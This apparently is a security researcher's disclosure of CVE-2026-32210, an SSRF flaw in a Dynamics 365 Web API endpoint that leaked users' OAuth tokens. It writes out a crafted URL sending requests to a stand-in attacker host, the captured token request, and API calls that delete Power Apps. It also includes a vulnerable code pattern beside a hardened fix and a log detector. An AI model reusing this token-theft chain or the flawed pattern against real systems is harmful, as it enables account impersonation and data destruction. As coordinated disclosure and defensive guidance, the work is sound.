12 June 2026 · 5 min read · Research
Hackify discovered a vulnerability in Microsoft Dynamics 365 (online) that let an authenticated user use Server-Side Request Forgery (SSRF) to make the server send an outbound HTTP request to a destination of the attacker’s choosing. That outbound request carried the victim’s OAuth bearer token. With that token, the Power Platform API could then be queried to read, modify and delete Power Apps. Microsoft registered the vulnerability as CVE-2026-32210 and has since fully mitigated it on the service side. Users do not need to take any action.
Microsoft Dynamics 365 (online) is a cloud-based platform for CRM and ERP applications, such as sales, customer service, finance and operations in a single online environment. Under the hood, Dynamics 365 runs on Dataverse, the data platform of Microsoft Power Platform, which is exposed through a Web API. That same Power Platform layer also serves Power Apps, Power Automate and Copilot Studio.
The vulnerability is in the Dataverse Web API endpoint msdyn_UCIClientAuth of Dynamics 365 (online). This endpoint accepts a user-controlled URL in the parameter @EndpointEnum. The backend then performs an HTTP request to that URL on behalf of the server.
Two properties make this serious. First, the SSRF is non-blind. The response body of the external request is returned to the caller and rendered in the Dynamics page, so the attacker sees the response. Second, the bearer token leaks. The outbound, server-side request contains the logged-in user’s OAuth bearer token in the Authorization header. By sending that request to an attacker-controlled endpoint, the token ends up with the attacker.
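As an added illustration (not Microsoft's code; the enum table and the host suffixes are assumptions), here is the pattern the write-up describes next to a hardened version that treats the parameter as an enum name rather than a URL and never forwards the caller's token to a host outside a fixed allow-list:

```python
from urllib.parse import urlsplit

# Assumed enum-to-URL table; names and URLs are illustrative, not Microsoft's.
ENDPOINT_TABLE = {
    "PowerPlatformApi": "https://api.powerplatform.com/",
    "TenantApi": "https://contoso.tenant.api.powerplatform.com/",
}
# Assumed first-party suffixes that may ever receive the user's token.
TOKEN_FORWARD_SUFFIXES = (".powerplatform.com", ".dynamics.com")


def vulnerable_build_request(endpoint_param: str, bearer: str) -> dict:
    """Pattern the write-up describes: the OData string parameter is used as
    the outbound URL and the caller's token is forwarded wherever it points."""
    url = endpoint_param.strip("'")
    return {"url": url, "headers": {"Authorization": f"Bearer {bearer}"}}


def credentials_may_be_forwarded(url: str) -> bool:
    """Defence in depth: only https URLs on first-party hosts get credentials."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    return parts.scheme == "https" and any(
        host == s.lstrip(".") or host.endswith(s) for s in TOKEN_FORWARD_SUFFIXES
    )


def hardened_build_request(endpoint_param: str, bearer: str) -> dict:
    """Treat the parameter as an enum name, never as a URL. Unknown names are
    rejected, and the resolved URL is re-checked before credentials go out."""
    name = endpoint_param.strip("'")
    if name not in ENDPOINT_TABLE:
        raise ValueError(f"unknown endpoint enum: {name!r}")
    url = ENDPOINT_TABLE[name]
    headers = {}
    if credentials_may_be_forwarded(url):
        headers["Authorization"] = f"Bearer {bearer}"
    return {"url": url, "headers": headers}
```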
The vulnerability is present on the Dynamics 365 (online) environment URLs of the form https://<environment-id>.<region>.dynamics.com and appears to occur worldwide, across all regional endpoints. Any authenticated user, from any tenant, can become a victim once they are lured into visiting a crafted URL.
The attacker sets up an HTTPS endpoint that fully logs incoming requests, including the source IP and all request headers. This can be a self-hosted web server or Burp Suite Collaborator. In the examples below, https://attacker.example.com/demo stands in for the attacker endpoint; we leave out the real domain here.
The victim is logged in to their Dynamics 365 environment (for example https://org251c08a7.crm4.dynamics.com) and, while that session is active, visits the following URL:
https://org251c08a7.crm4.dynamics.com/api/data/v9.0/msdyn_UCIClientAuth(EndpointEnum=@EndpointEnum,RequestMethod=@RequestMethod,RequestBody=@RequestBody,RequestHeaders=@RequestHeaders)?@EndpointEnum=%27https%3A%2F%2Fattacker.example.com%2Fdemo%27&@RequestMethod=%27GET%27&@RequestBody=null&@RequestHeaders=null
Here the parameter @EndpointEnum contains the attacker endpoint (https://attacker.example.com/demo), and @RequestMethod is set to GET.
Dynamics performs the server-side request to https://attacker.example.com/demo. The response body of that server is returned and shown in the Dynamics page:
{
"@odata.context": "https://org251c08a7.crm4.dynamics.com/api/data/v9.0/$metadata#Microsoft.Dynamics.CRM.msdyn_UCIClientAuthResponse",
"statuscode": "200",
"response": "This is an HTML response from the attacker.example.com website, provided as a demonstration of the SSRF vulnerability.\n"
}
This confirms that the SSRF is non-blind. The external response comes back to the caller.
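An added detection example, not part of the original write-up: it scans constructed access-log lines for msdyn_UCIClientAuth calls whose decoded @EndpointEnum points at a host outside an assumed first-party suffix list (the log format and the suffixes are assumptions):

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed first-party suffixes; adjust to the tenant's own inventory.
FIRST_PARTY_SUFFIXES = (".dynamics.com", ".powerplatform.com", ".microsoft.com")
# Matches the request line of a common access-log format.
UCI_AUTH = re.compile(r'"[A-Z]+ (?P<path>\S*msdyn_UCIClientAuth\S*) HTTP/[\d.]+"')

# Constructed sample log: one call aimed at an external host, one at a
# first-party API, and one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - victim - [12/Jun/2026:10:00:01 +0000] "GET /api/data/v9.0/msdyn_UCIClientAuth(EndpointEnum=@EndpointEnum,RequestMethod=@RequestMethod,RequestBody=@RequestBody,RequestHeaders=@RequestHeaders)?@EndpointEnum=%27https%3A%2F%2Fattacker.example.com%2Fdemo%27&@RequestMethod=%27GET%27&@RequestBody=null&@RequestHeaders=null HTTP/1.1" 200 312
203.0.113.5 - victim - [12/Jun/2026:10:00:02 +0000] "GET /api/data/v9.0/msdyn_UCIClientAuth(EndpointEnum=@EndpointEnum,RequestMethod=@RequestMethod,RequestBody=@RequestBody,RequestHeaders=@RequestHeaders)?@EndpointEnum=%27https%3A%2F%2Fapi.powerplatform.com%2F%27&@RequestMethod=%27GET%27&@RequestBody=null&@RequestHeaders=null HTTP/1.1" 200 512
203.0.113.7 - other - [12/Jun/2026:10:00:03 +0000] "GET /api/data/v9.0/accounts?$top=5 HTTP/1.1" 200 1024
"""


def endpoint_target(path: str) -> Optional[str]:
    """Decode @EndpointEnum from a request path; OData string quotes are stripped."""
    values = parse_qs(urlsplit(path).query).get("@EndpointEnum")
    return values[0].strip("'") if values else None


def is_first_party(host: str) -> bool:
    host = host.lower()
    return any(host == s.lstrip(".") or host.endswith(s) for s in FIRST_PARTY_SUFFIXES)


def find_suspicious(log_text: str) -> list:
    """One finding per msdyn_UCIClientAuth call whose target host is not first-party."""
    findings = []
    for line in log_text.splitlines():
        match = UCI_AUTH.search(line)
        if not match:
            continue
        target = endpoint_target(match.group("path"))
        if target is None:
            continue
        host = urlsplit(target).hostname or ""  # missing/odd scheme -> "" -> flagged
        if not is_first_party(host):
            findings.append({"client": line.split()[0], "host": host, "target": target})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"ALERT client={f['client']} server would call {f['target']}")
```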
On the attacker server, an incoming request appears, originating from a Microsoft IP address, carrying the victim’s Authorization header:
GET /demo HTTP/1.1
From IP: 98.71.111.236
Accept: application/json
Authorization: Bearer eyJ0eXAiOiJKV1Qi...<truncated>...
Host: attacker.example.com
Connection: Keep-Alive
The token is a JWT with the following relevant claims:
- aud: https://api.powerplatform.com
- iss: https://sts.windows.net/<tenant-id>/
- iat / exp: issued-at and expiry timestamps
- scp (selection): PowerApps.Apps.Read, PowerApps.Apps.Update, PowerApps.Apps.Delete, PowerApps.AppPermissions.Create, Connectivity.Connectors.Write, CopilotStudio.Copilots.Invoke, PowerVirtualAgents.Conversations.Read and various other Power Platform and AI scopes.
The token is also not bound to the client IP or the browser session. As a result, the attacker can reuse it from their own system.
With the stolen token, the attacker queries the Power Platform API:
GET /powerapps/apps?api-version=1 HTTP/2
Host: <environment-id>.environment.api.powerplatform.com
Authorization: Bearer eyJ0eXAiOiJKV1Qi...<truncated>...
The response (HTTP/2 200 OK) contains a list of Power Apps in the victim’s environment. This confirms that the token is valid and reusable and is not tied to a session or IP. The token works against, among others:
- https://api.powerplatform.com
- https://<environment-id>.environment.api.powerplatform.com
- https://<tenant-id>.tenant.api.powerplatform.com
With the same token, the attacker can delete a Power App by using the id from the previous response:
DELETE /powerapps/apps/<app-id>?api-version=1 HTTP/2
Host: <environment-id>.environment.api.powerplatform.com
Authorization: Bearer eyJ0eXAiOiJKV1Qi...<truncated>...
The Power App is deleted. Besides deletion, modifying Power Apps is also possible, within the victim’s permission scope, for as long as the token is valid (roughly 70 minutes).
The video below shows the full chain, from triggering the SSRF to deleting a Power App with the stolen token.
Successful exploitation amounts to impersonation of an authenticated user within their permission scope. An attacker who lures a victim into opening a single crafted URL can steal their Power Platform bearer token and use it to enumerate, modify and delete Power Apps. Because the vulnerability appeared to be present on all regional Dynamics 365 (online) endpoints, in principle any authenticated user from any tenant could be a target.
| Metric | Value |
|---|---|
| CVE | CVE-2026-32210 |
| Type | Server-Side Request Forgery (CWE-918), with token leak (CWE-522) and unintended proxy (CWE-441) |
| Affected component | Dataverse Web API (msdyn_UCIClientAuth endpoint); Power Platform REST API |
| Max severity | Critical |
| CVSS score (Microsoft) | 9.3 (base) / 8.1 (temporal) |
| CVSS vector (Microsoft) | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N/E:U/RL:O/RC:C |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required |
| Scope | Changed |
| Confidentiality | High |
| Integrity | High |
| Availability | None |
This vulnerability has been fully mitigated by Microsoft on the service side. Users of Microsoft Dynamics 365 (online) do not need to take any action. Microsoft published the CVE as part of its transparency around cloud vulnerabilities (see Toward greater transparency: Unveiling Cloud Service CVEs).
This vulnerability was reported by Sander Meijering of Hackify. Microsoft recognises contributions from the security community through coordinated vulnerability disclosure; the acknowledgement is included with CVE-2026-32210.